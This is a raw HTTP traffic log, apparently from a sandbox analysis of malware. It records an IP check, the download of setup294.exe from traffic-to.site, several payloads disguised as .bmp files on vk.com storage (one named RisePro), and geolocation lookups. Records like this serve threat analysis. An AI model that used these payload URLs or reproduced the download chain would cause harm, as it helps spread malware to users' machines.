Network Analysis

GET / HTTP/1.1 Connection: Keep-Alive User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36 Host: api.myip.com

HTTP/1.1 200 OK Date: Thu, 29 Jun 2023 00:44:00 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive vary: Accept-Encoding CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=9qzVCrqEUNhNkpvsakz6YW1Q5YayG0kPrdZTPAkPYXRYOqCL3syEjpglnHQw1cPHYzuksqKxflS6kNp%2FONb%2BJpgv8E8h7igmWrczJZUKP2w5Zn7WAkQnz%2B%2BCweahrQ%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 7dea2377be1e8cf8-KIX

GET /doc746114504_647280747?hash=cvDFKP5q0CQEjBCbeoeHvPNrWE0xbMxZEmrkIeNKcET&dl=G42DMMJRGQ2TANA:1661413520:uZNj68vRUvQaydRD8wpAK8zluN0I7otw5AHbA1ZlN9T&api=1&no_preview=1 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36 Host: vk.com Cache-Control: no-cache

HTTP/1.1 200 OK Server: kittenx Date: Thu, 29 Jun 2023 00:44:05 GMT Content-Type: text/html; charset=windows-1251 Content-Length: 232486 Connection: keep-alive X-Powered-By: KPHP/7.4.114033 Set-Cookie: remixir=DELETED; expires=Thu, 01 Jan 1970 00:00:01 GMT; path=/; domain=.vk.com; secure; HttpOnly Set-Cookie: remixlang=17; expires=Tue, 25 Jun 2024 20:32:42 GMT; path=/; domain=.vk.com Set-Cookie: remixstlid=9110323644461451188_3YHXJ968peGI1TewwnTtm3VKJZEbNqRWaCoB22z811w; expires=Fri, 28 Jun 2024 00:44:05 GMT; path=/; domain=.vk.com; secure Set-Cookie: remixstemp=DELETED; expires=Thu, 01 Jan 1970 00:00:01 GMT; path=/; domain=.vk.com; secure Set-Cookie: remixlgck=2cfd7e6f6849c79957; expires=Fri, 21 Jun 2024 15:32:00 GMT; path=/; domain=.vk.com; secure; HttpOnly Set-Cookie: remixstid=1552697871_p6C2ZUtIiAPXJCK8KR19Pe9piPZ7V3pWIuQMfCldZTk; expires=Thu, 27 Jun 2024 19:29:17 GMT; path=/; domain=.vk.com; secure Cache-control: no-store X-Robots-Tag: noindex,nofollow Content-Security-Policy: default-src * data: blob: about: vkcalls:;script-src 'self' https://vk.com https://*.vk.com https://vk.ru https://*.vk.ru https://static.vk.me https://*.mail.ru https://r.mradx.net https://s.ytimg.com https://platform.twitter.com https://cdn.syndication.twimg.com https://www.instagram.com https://connect.facebook.net https://telegram.org https://*.yandex.ru https://*.google-analytics.com https://*.youtube.com https://maps.googleapis.com https://translate.googleapis.com https://*.google.com https://google.com https://*.vkpartner.ru https://*.moatads.com https://*.adlooxtracking.ru https://*.serving-sys.ru https://*.weborama-tech.ru https://*.gstatic.com https://*.google.ru https://securepubads.g.doubleclick.net https://cdn.ampproject.org https://www.googletagmanager.com https://googletagmanager.com https://*.vk-cdn.net https://*.hit.gemius.pl https://yastatic.net https://analytics.tiktok.com 'unsafe-inline' 'unsafe-eval' blob:;style-src https://vk.com https://*.vk.com https://vk.ru https://*.vk.ru https://static.vk.me https://r.mradx.net https://ton.twimg.com https://tagmanager.google.com https://platform.twitter.com https://*.googleapis.com 'self' 'unsafe-inline' X-XSS-Protection: 1; report=/xss_reports X-Frame-Options: deny X-Frontend: front605106 Strict-Transport-Security: max-age=15768000 Access-Control-Expose-Headers: X-Frontend

GET /294/setup294.exe HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36 Host: traffic-to.site Cache-Control: no-cache

HTTP/1.1 200 OK Date: Thu, 29 Jun 2023 00:44:09 GMT Content-Type: application/octet-stream Content-Length: 1710619 Connection: keep-alive Last-Modified: Mon, 26 Jun 2023 16:45:42 GMT ETag: "6499c0b6-1a1a1b" Expires: Thu, 31 Dec 2037 23:55:55 GMT Cache-Control: max-age=315360000 CF-Cache-Status: HIT Age: 200502 Accept-Ranges: bytes Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=aycGw%2Bhb7EVFA3LbRyW1aoYB%2BU3%2FMIt3fK%2FusLbX3Ow6rqazu1%2BURTEJCFhmltZg65BIOCN3h4fWS%2F%2FJirG0T%2FfW%2FF8qe%2BSKKbowQmNhJjH4%2FBRpeDUNvoD3w86FFEtmjPo%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 7dea23ad4b728d22-KIX alt-svc: h3=":443"; ma=86400

GET /doc808950829_663416193?hash=TwgmTA3pMX5XUbfBEPazmzdRVPdFw9t8BbYBqJvidU8&dl=H6DzAmaBeDTytHVbTKfRExM88kxUqIpLizX7g2YgUEL&api=1&no_preview=1#WW1 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36 Host: vk.com Cache-Control: no-cache Cookie: remixlang=17; remixstlid=9110323644461451188_3YHXJ968peGI1TewwnTtm3VKJZEbNqRWaCoB22z811w; remixlgck=2cfd7e6f6849c79957; remixstid=1552697871_p6C2ZUtIiAPXJCK8KR19Pe9piPZ7V3pWIuQMfCldZTk

HTTP/1.1 302 Found Server: kittenx Date: Thu, 29 Jun 2023 00:44:14 GMT Content-Type: text/html; charset=windows-1251 Content-Length: 0 Connection: keep-alive X-Powered-By: KPHP/7.4.114033 Set-Cookie: remixir=DELETED; expires=Thu, 01 Jan 1970 00:00:01 GMT; path=/; domain=.vk.com; secure; HttpOnly Set-Cookie: remixir=1; path=/; domain=.vk.com; secure; HttpOnly Cache-control: no-store X-Robots-Tag: noindex,nofollow Location: https://sun6-23.userapi.com/c909518/u808950829/docs/d20/61b6f7cfa51a/WWW1.bmp?extra=ljjMJ3TZ6hB8z3zwpU99CbXdGMsJI37sAXQrCBdep_p8xUGOtNMgqpIxMsmiJLj5QoskckZTqv7df5SHMp18fg6UihbFQ_501LVeEZnkMxFXFdlVvN33LhTs5MPpa_6q5C2eczyDM2RpNwcblg X-Frontend: front605106 Strict-Transport-Security: max-age=15768000 Access-Control-Expose-Headers: X-Frontend

GET /c909518/u808950829/docs/d20/61b6f7cfa51a/WWW1.bmp?extra=ljjMJ3TZ6hB8z3zwpU99CbXdGMsJI37sAXQrCBdep_p8xUGOtNMgqpIxMsmiJLj5QoskckZTqv7df5SHMp18fg6UihbFQ_501LVeEZnkMxFXFdlVvN33LhTs5MPpa_6q5C2eczyDM2RpNwcblg HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36 Host: sun6-23.userapi.com Cache-Control: no-cache Connection: Keep-Alive

HTTP/1.1 200 OK Server: kittenx Date: Thu, 29 Jun 2023 00:44:15 GMT Content-Type: image/x-ms-bmp Content-Length: 4861444 Connection: keep-alive Last-Modified: Mon, 26 Jun 2023 16:14:42 GMT ETag: "6499b972-4a2e04" Expires: Sat, 29 Jul 2023 00:44:15 GMT Cache-Control: max-age=2592000 X-Frontend: front6-23 Access-Control-Expose-Headers: X-Frontend Access-Control-Allow-Origin: * Access-Control-Allow-Methods: GET, HEAD, OPTIONS Strict-Transport-Security: max-age=15768000 Access-Control-Allow-Headers: X-Quic Timing-Allow-Origin: * Accept-Ranges: bytes

GET /doc808950829_663496587?hash=9HBIzrbBWHKqUnGhHt30dMcZIm1RpmRRZBzZ89JCfGw&dl=JRIT3v6zzNFrou8UYI02dSfdibpUzCLo9YvFXREFvCT&api=1&no_preview=1 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36 Host: vk.com Cache-Control: no-cache Cookie: remixlang=17; remixstlid=9110323644461451188_3YHXJ968peGI1TewwnTtm3VKJZEbNqRWaCoB22z811w; remixlgck=2cfd7e6f6849c79957; remixstid=1552697871_p6C2ZUtIiAPXJCK8KR19Pe9piPZ7V3pWIuQMfCldZTk

HTTP/1.1 302 Found Server: kittenx Date: Thu, 29 Jun 2023 00:44:16 GMT Content-Type: text/html; charset=windows-1251 Content-Length: 0 Connection: keep-alive X-Powered-By: KPHP/7.4.114033 Set-Cookie: remixir=DELETED; expires=Thu, 01 Jan 1970 00:00:01 GMT; path=/; domain=.vk.com; secure; HttpOnly Set-Cookie: remixir=1; path=/; domain=.vk.com; secure; HttpOnly Cache-control: no-store X-Robots-Tag: noindex,nofollow Location: https://sun6-20.userapi.com/c909228/u808950829/docs/d39/fe32b742760a/PMmp.bmp?extra=VZzlNMvHOBAlFaKT3PjM7fzi2fO1PPHeyMDNPJJo2rbXe1_0xuj-7wPnu8H3ebUInclJGriwMal7va3N5ZM4ubwgDbdcETztEzEEiU7RebYw6sd84k5eBF3RcG0YctzIckqf5x0ELarzyLZzpA X-Frontend: front605106 Strict-Transport-Security: max-age=15768000 Access-Control-Expose-Headers: X-Frontend

GET /c909228/u808950829/docs/d39/fe32b742760a/PMmp.bmp?extra=VZzlNMvHOBAlFaKT3PjM7fzi2fO1PPHeyMDNPJJo2rbXe1_0xuj-7wPnu8H3ebUInclJGriwMal7va3N5ZM4ubwgDbdcETztEzEEiU7RebYw6sd84k5eBF3RcG0YctzIckqf5x0ELarzyLZzpA HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36 Host: sun6-20.userapi.com Cache-Control: no-cache Connection: Keep-Alive

HTTP/1.1 200 OK Server: kittenx Date: Thu, 29 Jun 2023 00:44:17 GMT Content-Type: image/x-ms-bmp Content-Length: 6771716 Connection: keep-alive Last-Modified: Wed, 28 Jun 2023 10:02:40 GMT ETag: "649c0540-675404" Expires: Sat, 29 Jul 2023 00:44:17 GMT Cache-Control: max-age=2592000 X-Frontend: front6-20 Access-Control-Expose-Headers: X-Frontend Access-Control-Allow-Origin: * Access-Control-Allow-Methods: GET, HEAD, OPTIONS Strict-Transport-Security: max-age=15768000 Access-Control-Allow-Headers: X-Quic Timing-Allow-Origin: * Accept-Ranges: bytes

GET /doc808950829_663517352?hash=r3SKbalnpLNEHhXDkdRZoDypstvcuZiLfoTMrICifxw&dl=ZGd5edeCxcDIPFuau0XPrh3wmYQ6Se1iGNYMxGiLZ7s&api=1&no_preview=1#3 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36 Host: vk.com Cache-Control: no-cache Cookie: remixlang=17; remixstlid=9110323644461451188_3YHXJ968peGI1TewwnTtm3VKJZEbNqRWaCoB22z811w; remixlgck=2cfd7e6f6849c79957; remixstid=1552697871_p6C2ZUtIiAPXJCK8KR19Pe9piPZ7V3pWIuQMfCldZTk

HTTP/1.1 302 Found Server: kittenx Date: Thu, 29 Jun 2023 00:44:17 GMT Content-Type: text/html; charset=windows-1251 Content-Length: 0 Connection: keep-alive X-Powered-By: KPHP/7.4.114033 Set-Cookie: remixir=DELETED; expires=Thu, 01 Jan 1970 00:00:01 GMT; path=/; domain=.vk.com; secure; HttpOnly Set-Cookie: remixir=1; path=/; domain=.vk.com; secure; HttpOnly Cache-control: no-store X-Robots-Tag: noindex,nofollow Location: https://sun6-22.userapi.com/c909618/u808950829/docs/d60/ae911c61a5dd/3.bmp?extra=F2b9KK27JpNtvBMC1Y4yaeVn55GajWT6ciGj7uK36P0TiSSHZYJttEnVZ7xiAehKEXj_62ejLS8U620U5C6HvQBD2g1TRCh8y4HgaC8ufeTVNhlHShxa-wiNuI7TnC-rQhAKOOT_JiQCWPewSw X-Frontend: front605106 Strict-Transport-Security: max-age=15768000 Access-Control-Expose-Headers: X-Frontend

GET /c909618/u808950829/docs/d60/ae911c61a5dd/3.bmp?extra=F2b9KK27JpNtvBMC1Y4yaeVn55GajWT6ciGj7uK36P0TiSSHZYJttEnVZ7xiAehKEXj_62ejLS8U620U5C6HvQBD2g1TRCh8y4HgaC8ufeTVNhlHShxa-wiNuI7TnC-rQhAKOOT_JiQCWPewSw HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36 Host: sun6-22.userapi.com Cache-Control: no-cache Connection: Keep-Alive

HTTP/1.1 200 OK Server: kittenx Date: Thu, 29 Jun 2023 00:44:18 GMT Content-Type: image/x-ms-bmp Content-Length: 223884 Connection: keep-alive Last-Modified: Wed, 28 Jun 2023 16:22:22 GMT ETag: "649c5e3e-36a8c" Expires: Sat, 29 Jul 2023 00:44:18 GMT Cache-Control: max-age=2592000 X-Frontend: front6-22 Access-Control-Expose-Headers: X-Frontend Access-Control-Allow-Origin: * Access-Control-Allow-Methods: GET, HEAD, OPTIONS Strict-Transport-Security: max-age=15768000 Access-Control-Allow-Headers: X-Quic Timing-Allow-Origin: * Accept-Ranges: bytes

GET /doc791620691_663065029?hash=Efubo9FQtw3Bdj42XJVcJwymfIH3PazMKz8g5wJ0dZX&dl=G44TCNRSGA3DSMI:1682787066:QgrgzF33wDt9bwmmOgWCYTv61J7HwhLVZOXGaEdWiKP&api=1&no_preview=1#test HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36 Host: vk.com Cache-Control: no-cache Cookie: remixlang=17; remixstlid=9110323644461451188_3YHXJ968peGI1TewwnTtm3VKJZEbNqRWaCoB22z811w; remixlgck=2cfd7e6f6849c79957; remixstid=1552697871_p6C2ZUtIiAPXJCK8KR19Pe9piPZ7V3pWIuQMfCldZTk; remixir=1

HTTP/1.1 200 OK Server: kittenx Date: Thu, 29 Jun 2023 00:44:18 GMT Content-Type: text/html; charset=windows-1251 Content-Length: 232502 Connection: keep-alive X-Powered-By: KPHP/7.4.114033 Set-Cookie: remixir=DELETED; expires=Thu, 01 Jan 1970 00:00:01 GMT; path=/; domain=.vk.com; secure; HttpOnly Set-Cookie: remixstemp=DELETED; expires=Thu, 01 Jan 1970 00:00:01 GMT; path=/; domain=.vk.com; secure Cache-control: no-store X-Robots-Tag: noindex,nofollow Content-Security-Policy: default-src * data: blob: about: vkcalls:;script-src 'self' https://vk.com https://*.vk.com https://vk.ru https://*.vk.ru https://static.vk.me https://*.mail.ru https://r.mradx.net https://s.ytimg.com https://platform.twitter.com https://cdn.syndication.twimg.com https://www.instagram.com https://connect.facebook.net https://telegram.org https://*.yandex.ru https://*.google-analytics.com https://*.youtube.com https://maps.googleapis.com https://translate.googleapis.com https://*.google.com https://google.com https://*.vkpartner.ru https://*.moatads.com https://*.adlooxtracking.ru https://*.serving-sys.ru https://*.weborama-tech.ru https://*.gstatic.com https://*.google.ru https://securepubads.g.doubleclick.net https://cdn.ampproject.org https://www.googletagmanager.com https://googletagmanager.com https://*.vk-cdn.net https://*.hit.gemius.pl https://yastatic.net https://analytics.tiktok.com 'unsafe-inline' 'unsafe-eval' blob:;style-src https://vk.com https://*.vk.com https://vk.ru https://*.vk.ru https://static.vk.me https://r.mradx.net https://ton.twimg.com https://tagmanager.google.com https://platform.twitter.com https://*.googleapis.com 'self' 'unsafe-inline' X-XSS-Protection: 1; report=/xss_reports X-Frame-Options: deny X-Frontend: front605106 Strict-Transport-Security: max-age=15768000 Access-Control-Expose-Headers: X-Frontend

GET /doc791620691_663065029?hash=Efubo9FQtw3Bdj42XJVcJwymfIH3PazMKz8g5wJ0dZX&dl=G44TCNRSGA3DSMI:1682787066:QgrgzF33wDt9bwmmOgWCYTv61J7HwhLVZOXGaEdWiKP&api=1&no_preview=1#stats HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36 Host: vk.com Cache-Control: no-cache Cookie: remixlang=17; remixstlid=9110323644461451188_3YHXJ968peGI1TewwnTtm3VKJZEbNqRWaCoB22z811w; remixlgck=2cfd7e6f6849c79957; remixstid=1552697871_p6C2ZUtIiAPXJCK8KR19Pe9piPZ7V3pWIuQMfCldZTk; remixir=1

HTTP/1.1 200 OK Server: kittenx Date: Thu, 29 Jun 2023 00:44:19 GMT Content-Type: text/html; charset=windows-1251 Content-Length: 232503 Connection: keep-alive X-Powered-By: KPHP/7.4.114033 Set-Cookie: remixir=DELETED; expires=Thu, 01 Jan 1970 00:00:01 GMT; path=/; domain=.vk.com; secure; HttpOnly Set-Cookie: remixstemp=DELETED; expires=Thu, 01 Jan 1970 00:00:01 GMT; path=/; domain=.vk.com; secure Cache-control: no-store X-Robots-Tag: noindex,nofollow Content-Security-Policy: default-src * data: blob: about: vkcalls:;script-src 'self' https://vk.com https://*.vk.com https://vk.ru https://*.vk.ru https://static.vk.me https://*.mail.ru https://r.mradx.net https://s.ytimg.com https://platform.twitter.com https://cdn.syndication.twimg.com https://www.instagram.com https://connect.facebook.net https://telegram.org https://*.yandex.ru https://*.google-analytics.com https://*.youtube.com https://maps.googleapis.com https://translate.googleapis.com https://*.google.com https://google.com https://*.vkpartner.ru https://*.moatads.com https://*.adlooxtracking.ru https://*.serving-sys.ru https://*.weborama-tech.ru https://*.gstatic.com https://*.google.ru https://securepubads.g.doubleclick.net https://cdn.ampproject.org https://www.googletagmanager.com https://googletagmanager.com https://*.vk-cdn.net https://*.hit.gemius.pl https://yastatic.net https://analytics.tiktok.com 'unsafe-inline' 'unsafe-eval' blob:;style-src https://vk.com https://*.vk.com https://vk.ru https://*.vk.ru https://static.vk.me https://r.mradx.net https://ton.twimg.com https://tagmanager.google.com https://platform.twitter.com https://*.googleapis.com 'self' 'unsafe-inline';report-uri /csp X-XSS-Protection: 1; report=/xss_reports X-Frame-Options: deny X-Frontend: front605106 Strict-Transport-Security: max-age=15768000 Access-Control-Expose-Headers: X-Frontend

GET /doc808950829_663224718?hash=MecbZtH1dewIoIW4kjPPGbZGLae6mvGIIKRzV97LeZz&dl=tuiyrZQKgq9qLcaQMk2ZMvnmbdHXhuzWormyzFZS5MT&api=1&no_preview=1 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36 Host: vk.com Cache-Control: no-cache Cookie: remixlang=17; remixstlid=9110323644461451188_3YHXJ968peGI1TewwnTtm3VKJZEbNqRWaCoB22z811w; remixlgck=2cfd7e6f6849c79957; remixstid=1552697871_p6C2ZUtIiAPXJCK8KR19Pe9piPZ7V3pWIuQMfCldZTk

HTTP/1.1 302 Found Server: kittenx Date: Thu, 29 Jun 2023 00:44:21 GMT Content-Type: text/html; charset=windows-1251 Content-Length: 0 Connection: keep-alive X-Powered-By: KPHP/7.4.114033 Set-Cookie: remixir=DELETED; expires=Thu, 01 Jan 1970 00:00:01 GMT; path=/; domain=.vk.com; secure; HttpOnly Set-Cookie: remixir=1; path=/; domain=.vk.com; secure; HttpOnly Cache-control: no-store X-Robots-Tag: noindex,nofollow Location: https://sun6-22.userapi.com/c909618/u808950829/docs/d28/48cb46c7a63f/ccloudcosmic.bmp?extra=VkJXQrROemTjw_2DoflDwZ9uMItbxt08ym2ypZRJ-FEjXT6xVFsep1emHxpmTxD4d8Kf4aFroEJxtjEtCqrZ60heNUjAFOlBWzL0XkFfhKvGr_dq1jEIvny9lih3e5-zcBxHiNCuXY0Vxut44Q X-Frontend: front605106 Strict-Transport-Security: max-age=15768000 Access-Control-Expose-Headers: X-Frontend

GET /c909618/u808950829/docs/d28/48cb46c7a63f/ccloudcosmic.bmp?extra=VkJXQrROemTjw_2DoflDwZ9uMItbxt08ym2ypZRJ-FEjXT6xVFsep1emHxpmTxD4d8Kf4aFroEJxtjEtCqrZ60heNUjAFOlBWzL0XkFfhKvGr_dq1jEIvny9lih3e5-zcBxHiNCuXY0Vxut44Q HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36 Host: sun6-22.userapi.com Cache-Control: no-cache Connection: Keep-Alive

HTTP/1.1 200 OK Server: kittenx Date: Thu, 29 Jun 2023 00:44:21 GMT Content-Type: image/x-ms-bmp Content-Length: 251908 Connection: keep-alive Last-Modified: Thu, 22 Jun 2023 17:31:10 GMT ETag: "6494855e-3d804" Expires: Sat, 29 Jul 2023 00:44:21 GMT Cache-Control: max-age=2592000 X-Frontend: front6-22 Access-Control-Expose-Headers: X-Frontend Access-Control-Allow-Origin: * Access-Control-Allow-Methods: GET, HEAD, OPTIONS Strict-Transport-Security: max-age=15768000 Access-Control-Allow-Headers: X-Quic Timing-Allow-Origin: * Accept-Ranges: bytes

GET /doc808950829_663371568?hash=nCbeQhSdektZCklmCq7XtG48Ee60nv8DORi9fErSJWH&dl=TYjpYtrURbaoeiox6ukI3zcdJlSPMzTTZwoXzpHEm48&api=1&no_preview=1#rise_test HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36 Host: vk.com Cache-Control: no-cache Cookie: remixlang=17; remixstlid=9110323644461451188_3YHXJ968peGI1TewwnTtm3VKJZEbNqRWaCoB22z811w; remixlgck=2cfd7e6f6849c79957; remixstid=1552697871_p6C2ZUtIiAPXJCK8KR19Pe9piPZ7V3pWIuQMfCldZTk; remixir=1

HTTP/1.1 302 Found Server: kittenx Date: Thu, 29 Jun 2023 00:44:22 GMT Content-Type: text/html; charset=windows-1251 Content-Length: 0 Connection: keep-alive X-Powered-By: KPHP/7.4.114033 Set-Cookie: remixir=DELETED; expires=Thu, 01 Jan 1970 00:00:01 GMT; path=/; domain=.vk.com; secure; HttpOnly Set-Cookie: remixir=1; path=/; domain=.vk.com; secure; HttpOnly Cache-control: no-store X-Robots-Tag: noindex,nofollow Location: https://sun6-20.userapi.com/c909228/u808950829/docs/d4/71e0c58f306b/RisePro_0_1_vgWJ8smB7NzPfuCfGTFK.bmp?extra=3Cg4yg-UpwzvuMvyrsIV03aSiTNLuwpyXiQT_Udm1BGJA0p9ZRy5fvES7sfolN431f_g90Lc-IHZBjwztx12khk9WtEWW_Lo3NhiK_80hG9HT27oqTryvNR9wdf2Ift-OtK49pdROiLxh9bogw X-Frontend: front605106 Strict-Transport-Security: max-age=15768000 Access-Control-Expose-Headers: X-Frontend

GET /c909228/u808950829/docs/d4/71e0c58f306b/RisePro_0_1_vgWJ8smB7NzPfuCfGTFK.bmp?extra=3Cg4yg-UpwzvuMvyrsIV03aSiTNLuwpyXiQT_Udm1BGJA0p9ZRy5fvES7sfolN431f_g90Lc-IHZBjwztx12khk9WtEWW_Lo3NhiK_80hG9HT27oqTryvNR9wdf2Ift-OtK49pdROiLxh9bogw HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36 Host: sun6-20.userapi.com Cache-Control: no-cache Connection: Keep-Alive

HTTP/1.1 200 OK Server: kittenx Date: Thu, 29 Jun 2023 00:44:23 GMT Content-Type: image/x-ms-bmp Content-Length: 1054724 Connection: keep-alive Last-Modified: Sun, 25 Jun 2023 18:06:59 GMT ETag: "64988243-101804" Expires: Sat, 29 Jul 2023 00:44:23 GMT Cache-Control: max-age=2592000 X-Frontend: front6-20 Access-Control-Expose-Headers: X-Frontend Access-Control-Allow-Origin: * Access-Control-Allow-Methods: GET, HEAD, OPTIONS Strict-Transport-Security: max-age=15768000 Access-Control-Allow-Headers: X-Quic Timing-Allow-Origin: * Accept-Ranges: bytes

GET /demo/home.php?s=175.208.134.152 HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36 Host: db-ip.com

GET / HTTP/1.1 Connection: Keep-Alive User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36 Host: db-ip.com

HTTP/1.1 200 OK Date: Thu, 29 Jun 2023 00:44:56 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Cache-control: max-age=28800 X-IPLB-Request-ID: AC46E919:BD40_93878F2E:0050_649C9BE9_1AA8B7D7:2467B X-IPLB-Instance: 30783 CF-Cache-Status: HIT Age: 14367 Last-Modified: Wed, 28 Jun 2023 20:45:29 GMT Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=mzjKjgjgIlkpGy%2BsIoy6kTQqzfK63aKsoL1EO47%2FDUQjV8MDlDo1vxYQx8E4HBhOSay%2Fp9nfLZ%2F2oIn9qtNAQRd%2FH9i6qQ1GbfGw6EEogtcgvUtUL14XRxEFIQ%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 7dea24d45d608376-KIX alt-svc: h3=":443"; ma=86400

POST /v2/p31e4d59ee6ad1a0b5cc80695a873e43a8fbca06/self HTTP/1.1 Connection: Keep-Alive Referer: https://db-ip.com/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36 Content-Length: 0 Host: api.db-ip.com

HTTP/1.1 200 OK Date: Thu, 29 Jun 2023 00:44:57 GMT Content-Type: application/json Transfer-Encoding: chunked Connection: keep-alive Access-Control-Allow-Origin: http*://*db-ip.com Cache-control: max-age=180 X-IPLB-Request-ID: AC46E966:64CC_93878F2E:0050_649CD409_1AACF81B:2467B X-IPLB-Instance: 30783 CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=K0hOx3QjF%2F5offkyroCgRbqUV7%2B9Nyjzu2rgvJjcdKf3e2VqGFemyXK3NJNHse76VoBu%2FjLXlnePQb2Ja4SSOV6zue7FMetcn6ssq0NOk2PCX2w%2FbDAzdDW9x3ZS%2BHk%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 7dea24d7dc758335-KIX alt-svc: h3=":443"; ma=86400

GET / HTTP/1.1 Connection: Keep-Alive User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36 Host: db-ip.com

HTTP/1.1 200 OK Date: Thu, 29 Jun 2023 00:44:57 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Cache-control: max-age=28800 X-IPLB-Request-ID: AC46E919:BD40_93878F2E:0050_649C9BE9_1AA8B7D7:2467B X-IPLB-Instance: 30783 CF-Cache-Status: HIT Age: 14368 Last-Modified: Wed, 28 Jun 2023 20:45:29 GMT Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=YLPIIoFZ46N50SBQ7BRaANS6kU3SYQYnWU7NNp2pBn9x3R4BWgzYHQuAu5KltcGt%2FnNIR4ckFn9UMtmnGGq7SX0kG47n%2Bpk1dAFLpX%2FJYrmbXN%2BjPtCC8SXOKQ%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 7dea24d86a528332-KIX alt-svc: h3=":443"; ma=86400

POST /v2/p31e4d59ee6ad1a0b5cc80695a873e43a8fbca06/self HTTP/1.1 Connection: Keep-Alive Referer: https://db-ip.com/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36 Content-Length: 0 Host: api.db-ip.com

HTTP/1.1 200 OK Date: Thu, 29 Jun 2023 00:44:57 GMT Content-Type: application/json Transfer-Encoding: chunked Connection: keep-alive Access-Control-Allow-Origin: http*://*db-ip.com Cache-control: max-age=180 X-IPLB-Request-ID: AC46E9BE:E8A8_93878F2E:0050_649CD409_1AB28ADE:2467C X-IPLB-Instance: 30783 CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=S239nOTLe1lOgD%2Fuz%2F0Lk3xZoRXsJx%2FwIkLD3Yfm06tG%2FcKj4fBrEoh%2B6eJTjDrtVjgHZ%2BsDqLmgNiEPCpzekJXL5cuO6WqCtxFByljEtO8UwZUFwqra1L7gKhW1DxA%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 7dea24d99b538322-KIX alt-svc: h3=":443"; ma=86400

